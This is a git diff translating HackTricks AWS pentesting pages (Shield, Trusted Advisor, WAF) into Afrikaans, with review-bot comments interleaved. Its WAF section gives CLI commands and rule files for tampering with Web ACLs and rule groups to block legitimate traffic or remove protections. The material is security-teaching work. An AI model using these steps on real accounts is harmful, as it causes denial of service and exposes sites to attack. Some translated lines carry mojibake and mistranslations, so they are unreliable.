-Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.** +Terwyl die Standard weergawe van Shield beskerming gebied het teen laag drie en laag vier, **Advanced bied ook beskerming teen laag sewe, toepassing, aanvalle.** {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md index a975d7476..8a0f1e205 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md 
@@ -4,72 +4,68 @@ {{#include ../../../../banners/hacktricks-training.md}} -## AWS Trusted Advisor Overview +## AWS Trusted Advisor Oorsig -Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories: +Trusted Advisor is 'n diens wat **aanbevelings verskaf** om jou AWS-rekening te optimaliseer, in lyn met **AWS beste praktyke**. Dit is 'n diens wat oor verskeie streke werk. Trusted Advisor bied insigte in vier primĂȘre kategorieĂ«: -1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses. -2. **Performance:** Identifies potential performance bottlenecks. -3. **Security:** Scans for vulnerabilities or weak security configurations. -4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance. +1. **Koste-optimalisering:** Stel voor hoe om hulpbronne te herstruktureer om uitgawes te verminder. +2. **Prestasie:** Identifiseer potensiĂ«le prestasie-knelpunte. +3. **Sekuriteit:** Skandeer vir kwesbaarhede of swak sekuriteitskonfigurasies. +4. **Fouttoleransie:** Beveel praktyke aan om diensweerstand en fouttoleransie te verbeter. -The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security. +Die omvattende kenmerke van Trusted Advisor is eksklusief beskikbaar met **AWS besigheids- of ondernemingsondersteuningsplanne**. Sonder hierdie planne is toegang beperk tot **ses kernkontroles**, wat hoofsaaklik op prestasie en sekuriteit gefokus is. -### Notifications and Data Refresh +### Kennisgewings en Data Vernuwing -- Trusted Advisor can issue alerts. -- Items can be excluded from its checks. -- Data is refreshed every 24 hours. 
However, a manual refresh is possible 5 minutes after the last refresh. +- Trusted Advisor kan waarskuwings uitreik. +- Items kan uitgesluit word van sy kontroles. +- Data word elke 24 uur vernuwe. 'n Handmatige vernuwing is egter moontlik 5 minute na die laaste vernuwing. -### **Checks Breakdown** +### **Kontroles Ontleding** -#### CategoriesCore +#### Kategoriese Kern -1. Cost Optimization -2. Security -3. Fault Tolerance -4. Performance -5. Service Limits -6. S3 Bucket Permissions +1. Koste-optimalisering +2. Sekuriteit +3. Fouttoleransie +4. Prestasie +5. Diensgrense +6. S3 Emmer Toestemmings -#### Core Checks +#### Kern Kontroles -Limited to users without business or enterprise support plans: +Beperk tot gebruikers sonder besigheids- of ondernemingsondersteuningsplanne: -1. Security Groups - Specific Ports Unrestricted -2. IAM Use -3. MFA on Root Account -4. EBS Public Snapshots -5. RDS Public Snapshots -6. Service Limits +1. Sekuriteitsgroepe - Spesifieke Poorte Onbeperk +2. IAM Gebruik +3. MFA op Wortelrekening +4. EBS Publieke Snapshot +5. RDS Publieke Snapshot +6. 
Diensgrense -#### Security Checks +#### Sekuriteitskontroles -A list of checks primarily focusing on identifying and rectifying security threats: +'n Lys van kontroles wat hoofsaaklik fokus op die identifisering en regstelling van sekuriteitsbedreigings: -- Security group settings for high-risk ports -- Security group unrestricted access -- Open write/list access to S3 buckets -- MFA enabled on root account -- RDS security group permissiveness -- CloudTrail usage -- SPF records for Route 53 MX records -- HTTPS configuration on ELBs -- Security groups for ELBs -- Certificate checks for CloudFront -- IAM access key rotation (90 days) -- Exposure of access keys (e.g., on GitHub) -- Public visibility of EBS or RDS snapshots -- Weak or absent IAM password policies +- Sekuriteitsgroepinstellings vir hoĂ«-risiko poorte +- Sekuriteitsgroep onbeperkte toegang +- Oop skryf/lis toegang tot S3 emmers +- MFA geaktiveer op wortelrekening +- RDS sekuriteitsgroep permissiwiteit +- CloudTrail gebruik +- SPF rekords vir Route 53 MX rekords +- HTTPS konfigurasie op ELBs +- Sekuriteitsgroepe vir ELBs +- Sertifikaatkontroles vir CloudFront +- IAM toegang sleutels rotasie (90 dae) +- Blootstelling van toegang sleutels (bv. op GitHub) +- Publieke sigbaarheid van EBS of RDS snapshots +- Swak of afwesige IAM wagwoordbeleide -AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices. +AWS Trusted Advisor dien as 'n belangrike hulpmiddel om die optimalisering, prestasie, sekuriteit en fouttoleransie van AWS dienste te verseker op grond van gevestigde beste praktyke. -## **References** +## **Verwysings** - [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor) {{#include ../../../../banners/hacktricks-training.md}} - - - - 
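Review bot: in the aws-trusted-advisor-enum.md hunk `+#### Kategoriese Kern` carries over the typo in `-#### CategoriesCore` and turns it into a different phrase (roughly "categorical core"); the heading introduces the six check categories, so it should read `#### Kategorieë` and the English source should be fixed to `Categories` as well. In the security checks list `+- Oop skryf/lis toegang tot S3 emmers` should use `lys` (list), and `Wortelrekening` / `MFA op Wortelrekening` translates the AWS root account literally (plant root); keep `Root-rekening` or `root-gebruiker`, since "root" is the AWS identifier the reader will search for in IAM and CloudTrail.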
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md index 661b836d5..bb678b7ca 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md 
@@ -6,103 +6,102 @@ ## AWS WAF -AWS WAF is a **web application firewall** designed to **safeguard web applications or APIs** against various web exploits which may impact their availability, security, or resource consumption. It empowers users to control incoming traffic by setting up **security rules** that mitigate typical attack vectors like SQL injection or cross-site scripting and also by defining custom filtering rules. +AWS WAF is 'n **webtoepassing vuurmuur** wat ontwerp is om **webtoepassings of API's** te beskerm teen verskeie webaanvalle wat hul beskikbaarheid, sekuriteit of hulpbronverbruik kan beĂŻnvloed. Dit stel gebruikers in staat om inkomende verkeer te beheer deur **sekuriteitsreĂ«ls** op te stel wat tipiese aanvalsvektore soos SQL-inspuiting of kruis-webskripting verminder en ook deur pasgemaakte filtrasie-reĂ«ls te definieer. -### Key concepts +### Sleutelkonsepte -#### Web ACL (Access Control List) +#### Web ACL (Toegang Beheerlys) -A Web ACL is a collection of rules that you can apply to your web applications or APIs. When you associate a Web ACL with a resource, AWS WAF inspects incoming requests based on the rules defined in the Web ACL and takes the specified actions. +'n Web ACL is 'n versameling van reĂ«ls wat jy op jou webtoepassings of API's kan toepas. Wanneer jy 'n Web ACL met 'n hulpbron assosieer, ondersoek AWS WAF inkomende versoeke gebaseer op die reĂ«ls wat in die Web ACL gedefinieer is en neem die gespesifiseerde aksies. -#### Rule Group +#### ReĂ«lgroep -A Rule Group is a reusable collection of rules that you can apply to multiple Web ACLs. Rule groups help manage and maintain consistent rule sets across different web applications or APIs. +'n ReĂ«lgroep is 'n herbruikbare versameling van reĂ«ls wat jy op verskeie Web ACL's kan toepas. ReĂ«lgroepe help om konsekwente reĂ«lstelle oor verskillende webtoepassings of API's te bestuur en te onderhou. 
-Each rule group has its associated **capacity**, which helps to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. Once its value is set during creation, it is not possible to modify it. +Elke reĂ«lgroep het sy geassosieerde **kapasiteit**, wat help om die bedryfsbronne wat gebruik word om jou reĂ«ls, reĂ«lgroepe en web ACL's te bestuur, te bereken en te beheer. Sodra die waarde tydens die skepping gestel is, is dit nie moontlik om dit te wysig nie. -#### Rule +#### ReĂ«l -A rule defines a set of conditions that AWS WAF uses to inspect incoming web requests. There are two main types of rules: +'n ReĂ«l definieer 'n stel voorwaardes wat AWS WAF gebruik om inkomende webversoeke te ondersoek. Daar is twee hoofsoorte reĂ«ls: -1. **Regular Rule**: This rule type uses specified conditions to determine whether to allow, block, or count web requests. -2. **Rate-Based Rule**: Counts requests from a specific IP address over a five-minute period. Here, users define a threshold, and if the number of requests from an IP exceeds this limit within five minutes, subsequent requests from that IP are blocked until the request rate drops below the threshold. The minimum threshold for rate-based rules is **2000 requests**. +1. **Reguliere ReĂ«l**: Hierdie reĂ«l tipe gebruik gespesifiseerde voorwaardes om te bepaal of webversoeke toegelaat, geblokkeer of getel moet word. +2. **Tarief-gebaseerde ReĂ«l**: Tel versoeke van 'n spesifieke IP-adres oor 'n vyf-minuut periode. Hier definieer gebruikers 'n drempel, en as die aantal versoeke van 'n IP hierdie limiet binne vyf minute oorskry, word daaropvolgende versoeke van daardie IP geblokkeer totdat die versoektarief onder die drempel daal. Die minimum drempel vir tarief-gebaseerde reĂ«ls is **2000 versoeke**. -#### Managed Rules +#### Geverifieerde ReĂ«ls -AWS WAF offers pre-configured, managed rule sets that are maintained by AWS and AWS Marketplace sellers. 
These rule sets provide protection against common threats and are regularly updated to address new vulnerabilities. +AWS WAF bied vooraf-gekonfigureerde, geverifieerde reĂ«lstelle wat deur AWS en AWS Marketplace verkopers onderhou word. Hierdie reĂ«lstelle bied beskerming teen algemene bedreigings en word gereeld opgedateer om nuwe kwesbaarhede aan te spreek. -#### IP Set +#### IP Stel -An IP Set is a list of IP addresses or IP address ranges that you want to allow or block. IP sets simplify the process of managing IP-based rules. +'n IP Stel is 'n lys van IP-adresse of IP-adresreekse wat jy wil toelaat of blokkeer. IP stelle vereenvoudig die proses om IP-gebaseerde reĂ«ls te bestuur. -#### Regex Pattern Set +#### Regex Patroon Stel -A Regex Pattern Set contains one or more regular expressions (regex) that define patterns to search for in web requests. This is useful for more complex matching scenarios, such as filtering specific sequences of characters. +'n Regex Patroon Stel bevat een of meer regulĂȘre uitdrukkings (regex) wat patrone definieer om in webversoeke te soek. Dit is nuttig vir meer komplekse ooreenkoms scenario's, soos om spesifieke volgordes van karakters te filtreer. #### Lock Token -A Lock Token is used for concurrency control when making updates to WAF resources. It ensures that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously. +'n Lock Token word gebruik vir gelyktydigheidsbeheer wanneer opdaterings aan WAF-hulpbronne gemaak word. Dit verseker dat veranderinge nie per ongeluk deur verskeie gebruikers of prosesse wat probeer om dieselfde hulpbron gelyktydig op te dateer, oorgeskryf word nie. -#### API Keys +#### API Sleutels -API Keys in AWS WAF are used to authenticate requests to certain API operations. These keys are encrypted and managed securely to control access and ensure that only authorized users can make changes to WAF configurations. 
+API Sleutels in AWS WAF word gebruik om versoeke na sekere API operasies te verifieer. Hierdie sleutels is versleuteld en veilig bestuur om toegang te beheer en te verseker dat slegs gemagtigde gebruikers veranderinge aan WAF-konfigurasies kan maak. -- **Example**: Integration of the CAPTCHA API. +- **Voorbeeld**: Integrasie van die CAPTCHA API. -#### Permission Policy +#### Toestemming Beleid -A Permission Policy is an IAM policy that specifies who can perform actions on AWS WAF resources. By defining permissions, you can control access to WAF resources and ensure that only authorized users can create, update, or delete configurations. +'n Toestemming Beleid is 'n IAM beleid wat spesifiseer wie aksies op AWS WAF-hulpbronne kan uitvoer. Deur toestemmings te definieer, kan jy toegang tot WAF-hulpbronne beheer en verseker dat slegs gemagtigde gebruikers konfigurasies kan skep, opdateer of verwyder. -#### Scope +#### Bereik -The scope parameter in AWS WAF specifies whether the WAF rules and configurations apply to a regional application or an Amazon CloudFront distribution. +Die bereikparameter in AWS WAF spesifiseer of die WAF-reĂ«ls en konfigurasies van toepassing is op 'n streeks toepassing of 'n Amazon CloudFront verspreiding. -- **REGIONAL**: Applies to regional services such as Application Load Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito user pool, AWS App Runner service and AWS Verified Access instance. You specify the AWS region where these resources are located. -- **CLOUDFRONT**: Applies to Amazon CloudFront distributions, which are global. WAF configurations for CloudFront are managed through the `us-east-1` region regardless of where the content is served. +- **REGIONAL**: Geld vir streeks dienste soos Toepassing Laai Balansers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito gebruikerspoel, AWS App Runner diens en AWS Verified Access instansie. 
Jy spesifiseer die AWS streek waar hierdie hulpbronne geleĂ« is. +- **CLOUDFRONT**: Geld vir Amazon CloudFront verspreidings, wat globaal is. WAF-konfigurasies vir CloudFront word deur die `us-east-1` streek bestuur ongeag waar die inhoud bedien word. -### Key features +### Sleutelkenmerke -#### Monitoring Criteria (Conditions) +#### Monitering Kriteria (Voorwaardes) -**Conditions** specify the elements of incoming HTTP/HTTPS requests that AWS WAF monitors, which include XSS, geographical location (GEO), IP addresses, Size constraints, SQL Injection, and patterns (strings and regex matching). It's important to note that **requests restricted at the CloudFront level based on country won't reach WAF**. +**Voorwaardes** spesifiseer die elemente van inkomende HTTP/HTTPS versoeke wat AWS WAF monitor, wat XSS, geografiese ligging (GEO), IP-adresse, Grootte beperkings, SQL-inspuiting, en patrone (stringe en regex ooreenkomste) insluit. Dit is belangrik om te noem dat **versoeke wat op die CloudFront vlak op grond van land beperk is, nie WAF sal bereik nie**. -Each AWS account can configure: +Elke AWS rekening kan konfigureer: -- **100 conditions** for each type (except for Regex, where only **10 conditions** are allowed, but this limit can be increased). -- **100 rules** and **50 Web ACLs**. -- A maximum of **5 rate-based rules**. -- A throughput of **10,000 requests per second** when WAF is implemented with an application load balancer. +- **100 voorwaardes** vir elke tipe (behalwe vir Regex, waar slegs **10 voorwaardes** toegelaat word, maar hierdie limiet kan verhoog word). +- **100 reĂ«ls** en **50 Web ACLs**. +- 'n maksimum van **5 tarief-gebaseerde reĂ«ls**. +- 'n deurset van **10,000 versoeke per sekonde** wanneer WAF geĂŻmplementeer word met 'n toepassing laai balancer. 
-#### Rule actions +#### ReĂ«l aksies -Actions are assigned to each rule, with options being: +Aksies word aan elke reĂ«l toegeken, met opsies soos: -- **Allow**: The request is forwarded to the appropriate CloudFront distribution or Application Load Balancer. -- **Block**: The request is terminated immediately. -- **Count**: Tallies the requests meeting the rule's conditions. This is useful for rule testing, confirming the rule's accuracy before setting it to Allow or Block. -- **CAPTCHA and Challenge:** It is verified that the request does not come from a bot using CAPTCHA puzzles and silent challenges. +- **Toelaat**: Die versoek word na die toepaslike CloudFront verspreiding of Toepassing Laai Balanser gestuur. +- **Blokkeer**: Die versoek word onmiddellik beĂ«indig. +- **Tel**: Tel die versoeke wat aan die reĂ«l se voorwaardes voldoen. Dit is nuttig vir reĂ«ltoetsing, om die akkuraatheid van die reĂ«l te bevestig voordat dit op Toelaat of Blokkeer gestel word. +- **CAPTCHA en Uitdaging:** Dit word geverifieer dat die versoek nie van 'n bot kom nie deur CAPTCHA legkaarte en stille uitdagings. -If a request doesn't match any rule within the Web ACL, it undergoes the **default action** (Allow or Block). The order of rule execution, defined within a Web ACL, is crucial and typically follows this sequence: +As 'n versoek nie aan enige reĂ«l binne die Web ACL voldoen nie, ondergaan dit die **standaard aksie** (Toelaat of Blokkeer). Die volgorde van reĂ«l uitvoering, wat binne 'n Web ACL gedefinieer is, is belangrik en volg tipies hierdie volgorde: -1. Allow Whitelisted IPs. -2. Block Blacklisted IPs. -3. Block requests matching any detrimental signatures. +1. Toelaat Witlys IP's. +2. Blokkeer Swartlys IP's. +3. Blokkeer versoeke wat enige nadelige handtekeninge ooreenstem. 
-#### CloudWatch Integration +#### CloudWatch Integrasie -AWS WAF integrates with CloudWatch for monitoring, offering metrics like AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. These metrics are reported every minute by default and retained for a period of two weeks. +AWS WAF integreer met CloudWatch vir monitering, wat metrieke soos AllowedRequests, BlockedRequests, CountedRequests, en PassedRequests bied. Hierdie metrieke word elke minuut standaard gerapporteer en vir 'n periode van twee weke behou. -### Enumeration +### Enumerasie -In order to interact with CloudFront distributions, you must specify the Region US East (N. Virginia): +Om met CloudFront verspreidings te kommunikeer, moet jy die Streek US East (N. Virginia) spesifiseer: -- CLI - Specify the Region US East when you use the CloudFront scope: `--scope CLOUDFRONT --region=us-east-1` . -- API and SDKs - For all calls, use the Region endpoint us-east-1. +- CLI - Spesifiseer die Streek US East wanneer jy die CloudFront bereik gebruik: `--scope CLOUDFRONT --region=us-east-1`. +- API en SDK's - Vir alle oproepe, gebruik die Streek eindpunt us-east-1. -In order to interact with regional services, you should specify the region: - -- Example with the region Europe (Spain): `--scope REGIONAL --region=eu-south-2` +Om met streeks dienste te kommunikeer, moet jy die streek spesifiseer: +- Voorbeeld met die streek Europa (Spanje): `--scope REGIONAL --region=eu-south-2` ```bash # Web ACLs # @@ -146,7 +145,7 @@ aws wafv2 list-ip-sets --scope | CLOUDFRONT --region= aws wafv2 get-ip-set --name --id --scope | CLOUDFRONT --region=us-east-1> ## Retrieve the keys that are currently being managed by a rate-based rule. aws wafv2 get-rate-based-statement-managed-keys --scope | CLOUDFRONT --region=us-east-1>\ - --web-acl-name --web-acl-id --rule-name [--rule-group-rule-name ] +--web-acl-name --web-acl-id --rule-name [--rule-group-rule-name ] # Regex pattern sets # 
@@ -186,78 +185,70 @@ aws wafv2 list-mobile-sdk-releases --platform aws wafv2 get-mobile-sdk-release --platform --release-version ``` - ### Post Exploitation / Bypass > [!TIP] -> From an attackers perspective, this service can help the attacker to identify WAF protections and network exposures that could help him to compromise other webs. +> Vanuit 'n aanvaller se perspektief kan hierdie diens die aanvaller help om WAF-beskermings en netwerkblootstellings te identifiseer wat hom kan help om ander webwerwe te kompromitteer. > -> However, an attacker could also be interested in disrupting this service so the webs aren't protected by the WAF. +> egter, 'n aanvaller kan ook belangstel om hierdie diens te ontwrig sodat die webwerwe nie deur die WAF beskerm word nie. -In many of the Delete and Update operations it would be necessary to provide the **lock token**. This token is used for concurrency control over the resources, ensuring that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously. In order to obtain this token you could perform the correspondent **list** or **get** operations over the specific resource. +In baie van die Verwyder en Opdateer operasies sal dit nodig wees om die **lock token** te verskaf. Hierdie token word gebruik vir mededingingsbeheer oor die hulpbronne, wat verseker dat veranderinge nie per ongeluk deur verskeie gebruikers of prosesse wat probeer om dieselfde hulpbron gelyktydig op te dateer, oorgeskryf word nie. Om hierdie token te verkry, kan jy die ooreenstemmende **lys** of **kry** operasies oor die spesifieke hulpbron uitvoer. #### **`wafv2:CreateRuleGroup`, `wafv2:UpdateRuleGroup`, `wafv2:DeleteRuleGroup`** -An attacker would be able to compromise the security of the affected resource by: - -- Creating rule groups that could, for instance, block legitimate traffic from legitimate IP addresses, causing a denial of service. 
-- Updating rule groups, being able to modify its actions for example from **Block** to **Allow**. -- Deleting rule groups that provide critical security measures. +'n Aanvaller sal in staat wees om die sekuriteit van die geraakte hulpbron te kompromitteer deur: +- ReĂ«lgroepe te skep wat, byvoorbeeld, wettige verkeer van wettige IP-adresse kan blokkeer, wat 'n ontkenning van diens veroorsaak. +- ReĂ«lgroepe op te dateer, wat in staat is om sy aksies te verander, byvoorbeeld van **Block** na **Allow**. +- ReĂ«lgroepe te verwyder wat kritieke sekuriteitsmaatreĂ«ls bied. ```bash # Create Rule Group aws wafv2 create-rule-group --name --capacity --visibility-config \ --scope | CLOUDFRONT --region=us-east-1> [--rules ] [--description ] # Update Rule Group aws wafv2 update-rule-group --name --id --visibility-config --lock-token \ - --scope | CLOUDFRONT --region=us-east-1> [--rules ] [--description ] +--scope | CLOUDFRONT --region=us-east-1> [--rules ] [--description ] # Delete Rule Group aws wafv2 delete-rule-group --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> ``` - -The following examples shows a rule group that would block legitimate traffic from specific IP addresses: - +Die volgende voorbeelde toon 'n reĂ«lgroep wat legitieme verkeer van spesifieke IP-adresse sou blokkeer: ```bash aws wafv2 create-rule-group --name BlockLegitimateIPsRuleGroup --capacity 1 --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=BlockLegitimateIPsRuleGroup --scope CLOUDFRONT --region us-east-1 --rules file://rule.json ``` - -The **rule.json** file would look like: - +Die **rule.json** lĂȘer sal soos volg lyk: ```json [ - { - "Name": "BlockLegitimateIPsRule", - "Priority": 0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action": { - "Block": {} - }, - "VisibilityConfig": { - "SampledRequestsEnabled": false, - 
"CloudWatchMetricsEnabled": false, - "MetricName": "BlockLegitimateIPsRule" - } - } +{ +"Name": "BlockLegitimateIPsRule", +"Priority": 0, +"Statement": { +"IPSetReferenceStatement": { +"ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +} +}, +"Action": { +"Block": {} +}, +"VisibilityConfig": { +"SampledRequestsEnabled": false, +"CloudWatchMetricsEnabled": false, +"MetricName": "BlockLegitimateIPsRule" +} +} ] ``` - -**Potential Impact**: Unauthorized access, data breaches, and potential DoS attacks. +**PotensiĂ«le Impak**: Ongeoorloofde toegang, datalekke, en potensiĂ«le DoS-aanvalle. #### **`wafv2:CreateWebACL`, `wafv2:UpdateWebACL`, `wafv2:DeleteWebACL`** -With these permissions, an attacker would be able to: +Met hierdie toestemmings kan 'n aanvaller: -- Create a new Web ACL, introducing rules that either allow malicious traffic through or block legitimate traffic, effectively rendering the WAF useless or causing a denial of service. -- Update existing Web ACLs, being able to modify rules to permit attacks such as SQL injection or cross-site scripting, which were previously blocked, or disrupt normal traffic flow by blocking valid requests. -- Delete a Web ACL, leaving the affected resources entirely unprotected, exposing it to a broad range of web attacks. +- 'n Nuwe Web ACL skep, wat reĂ«ls bekendstel wat of kwaadwillige verkeer toelaat of legitieme verkeer blokkeer, wat die WAF effektief nutteloos maak of 'n ontkenning van diens veroorsaak. +- Bestaande Web ACL's opdateer, wat in staat is om reĂ«ls te wysig om aanvalle soos SQL-inspuiting of kruis-webskripting toe te laat, wat voorheen geblokkeer was, of normale verkeersvloei te ontwrig deur geldige versoeke te blokkeer. +- 'n Web ACL verwyder, wat die betrokke hulpbronne heeltemal onbeskermd laat, en dit blootstel aan 'n wye reeks webaanvalle. > [!NOTE] -> You can only delete the specified **WebACL** if **ManagedByFirewallManager** is false. 
- +> Jy kan slegs die gespesifiseerde **WebACL** verwyder as **ManagedByFirewallManager** vals is. ```bash # Create Web ACL aws wafv2 create-web-acl --name --default-action --visibility-config \ 
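Review bot: the added Afrikaans lines in this hunk carry double-encoded UTF-8 (`ReĂ«lgroepe`, `PotensiĂ«le`, `lĂȘer` where `Reëlgroepe`, `Potensiële`, `lêer` are meant), so the file should be re-saved as plain UTF-8 before merge. The same hunk also strips the leading whitespace from lines inside fenced blocks that needed no translation (`-    --scope | CLOUDFRONT ...` becomes `+--scope | CLOUDFRONT ...`, and every `- "Name": ...` / `+"Name": ...` pair in rule.json): the bash continuation and the JSON stay valid, but the diff becomes noisy and the example loses its readability, so keep the original indentation and only translate the prose. Dropping the blank lines around the code fences is likewise unrelated to the translation and renders identically, so leave them in place.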
@@ -268,119 +259,109 @@ aws wafv2 update-web-acl --name --id --default-action -- # Delete Web ACL aws wafv2 delete-web-acl --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> ``` +Die volgende voorbeelde wys hoe om 'n Web ACL op te dateer om die legitieme verkeer van 'n spesifieke IP stel te blokkeer. As die oorspronklike IP nie met enige van daardie IP's ooreenstem nie, sal die standaardaksie ook wees om dit te blokkeer, wat 'n DoS veroorsaak. -The following examples shows how to update a Web ACL to block the legitimate traffic from a specific IP set. If the origin IP does not match any of those IPs, the default action would also be blocking it, causing a DoS. - -**Original Web ACL**: - +**Oorspronklike Web ACL**: ```json { - "WebACL": { - "Name": "AllowLegitimateIPsWebACL", - "Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", - "DefaultAction": { - "Allow": {} - }, - "Description": "", - "Rules": [ - { - "Name": "AllowLegitimateIPsRule", - "Priority": 0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action": { - "Allow": {} - }, - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "AllowLegitimateIPsRule" - } - } - ], - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "AllowLegitimateIPsWebACL" - }, - "Capacity": 1, - "ManagedByFirewallManager": false, - "LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:" - }, - "LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +"WebACL": { +"Name": "AllowLegitimateIPsWebACL", +"Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", +"ARN": 
"arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", +"DefaultAction": { +"Allow": {} +}, +"Description": "", +"Rules": [ +{ +"Name": "AllowLegitimateIPsRule", +"Priority": 0, +"Statement": { +"IPSetReferenceStatement": { +"ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +} +}, +"Action": { +"Allow": {} +}, +"VisibilityConfig": { +"SampledRequestsEnabled": false, +"CloudWatchMetricsEnabled": false, +"MetricName": "AllowLegitimateIPsRule" +} +} +], +"VisibilityConfig": { +"SampledRequestsEnabled": false, +"CloudWatchMetricsEnabled": false, +"MetricName": "AllowLegitimateIPsWebACL" +}, +"Capacity": 1, +"ManagedByFirewallManager": false, +"LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:" +}, +"LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" } ``` - -Command to update the Web ACL: - +Opdrag om die Web ACL op te dateer: ```json aws wafv2 update-web-acl --name AllowLegitimateIPsWebACL --scope REGIONAL --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --default-action Block={} --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=AllowLegitimateIPsWebACL --rules file://rule.json --region us-east-1 ``` - -The **rule.json** file would look like: - +Die **rule.json** lĂȘer sal soos volg lyk: ```json [ - { - "Name": "BlockLegitimateIPsRule", - "Priority": 0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action": { - "Block": {} - }, - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "BlockLegitimateIPRule" - } - } +{ +"Name": "BlockLegitimateIPsRule", +"Priority": 0, +"Statement": { +"IPSetReferenceStatement": { +"ARN": 
"arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +} +}, +"Action": { +"Block": {} +}, +"VisibilityConfig": { +"SampledRequestsEnabled": false, +"CloudWatchMetricsEnabled": false, +"MetricName": "BlockLegitimateIPRule" +} +} ] ``` - -**Potential Impact**: Unauthorized access, data breaches, and potential DoS attacks. +**PotensiĂ«le Impak**: Ongeoorloofde toegang, datalekke, en potensiĂ«le DoS-aanvalle. #### **`wafv2:AssociateWebACL`, `wafv2:DisassociateWebACL`** -The **`wafv2:AssociateWebACL`** permission would allow an attacker to associate web ACLs (Access Control Lists) with resources, being able to bypass security controls, allowing unauthorized traffic to reach the application, potentially leading to exploits like SQL injection or cross-site scripting (XSS). Conversely, with the **`wafv2:DisassociateWebACL`** permission, the attacker could temporarily disable security protections, exposing the resources to vulnerabilities without detection. +Die **`wafv2:AssociateWebACL`** toestemming sou 'n aanvaller in staat stel om web ACLs (Toegangsbeheerlisensies) met hulpbronne te assosieer, wat dit moontlik maak om sekuriteitsbeheermaatreĂ«ls te omseil, wat ongeoorloofde verkeer toelaat om die toepassing te bereik, wat potensieel kan lei tot ontploffings soos SQL-inspuiting of kruis-webscripting (XSS). Omgekeerd, met die **`wafv2:DisassociateWebACL`** toestemming, kan die aanvaller tydelik sekuriteitsbeskermings deaktiveer, wat die hulpbronne aan kwesbaarhede blootstel sonder opsporing. 
